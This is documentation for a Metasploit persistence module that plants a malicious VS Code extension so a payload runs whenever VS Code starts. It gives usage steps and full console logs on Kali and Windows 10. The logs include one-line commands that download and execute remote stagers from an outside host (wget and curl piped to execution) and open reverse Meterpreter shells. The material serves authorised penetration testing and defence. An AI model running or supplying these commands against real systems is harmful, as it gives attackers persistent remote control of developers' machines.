CoCalc -- vscode_extension.md

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/persistence/vscode_extension.md
⁷⁴⁵⁷⁶ views

Vulnerable Application

This module installs a malicious VS Code extension into the target's VS Code extensions directory. The extension executes the payload each time VS Code is launched, providing persistent code execution. Supports VS Code, VS Code Insiders, VSCodium, VS Code Server, and Cursor.

Tested against 1.120.0 on Kali and Windows 10

Verification Steps

Install the application
Start msfconsole
Get a shell
Do: use exploit/multi/persistence/vscode_extension
Do: run
You should get a shell when vscode opens next

Options

NAME

Name of the extension (Random if left blank). Defaults to ``.

PUBLISHER

Publisher name for the extension (Random if left blank). Defaults to ``.

DESCRIPTION

Description of the extension (Random if left blank). Defaults to ``.

USER

User to target, or current user if blank (Random if left blank). Defaults to ``.

ICON

Local path to an icon file (PNG) to include with the extension. Defaults to no icon

Scenarios

VSCode 1.120.0 on Kali

Original Shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO jNobBPgs --no-check-certificate http://1.1.1.1:8082/l; chmod +x jNobBPgs; ./jNobBPgs& disown
msf exploit(multi/script/web_delivery) > 
[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:60886) at 2026-05-15 08:54:57 -0400

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer     : h00die-kali
OS           : Debian  (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Persistence

msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/vscode_extension 
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > set target 1
target => 1
msf exploit(multi/persistence/vscode_extension) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: curl -so ./iMMtopaQ http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./iMMtopaQ;./iMMtopaQ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/vscode_extension) > 
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: /root/.vscode/extensions
[*] Using extension: fkhtvcu.cjfkvxfx-1.0.0
[*] Target user: h00die
[*] Installing to: /root/.vscode/extensions
[*] Creating extension directory: /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] Creating directory /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0 created
[+] Wrote package.json to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/package.json
[+] Wrote extension.js to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/extension.js
[+] Wrote payload to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/external
[*] Reading extensions.json...
[+] Registered extension in /root/.vscode/extensions/extensions.json
[!] VS Code is currently running - restart VS Code to activate the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260515.5724/h00die-kali_20260515.5724.rc
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.19.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:60160) at 2026-05-15 08:57:46 -0400

VSCode 1.120.0 on Windows 10

Original shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/sDEHsFj37VRR4ySrr8_b_w & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /sDEHsFj37VRR4ySrr8_b_w
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Client 2.2.2.2 requested /sDEHsFj37VRR4ySrr8_b_w
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:64885) at 2026-05-15 08:37:21 -0400

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PTMHF3\h00die
meterpreter > sysinfo
Computer        : DESKTOP-3PTMHF3
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...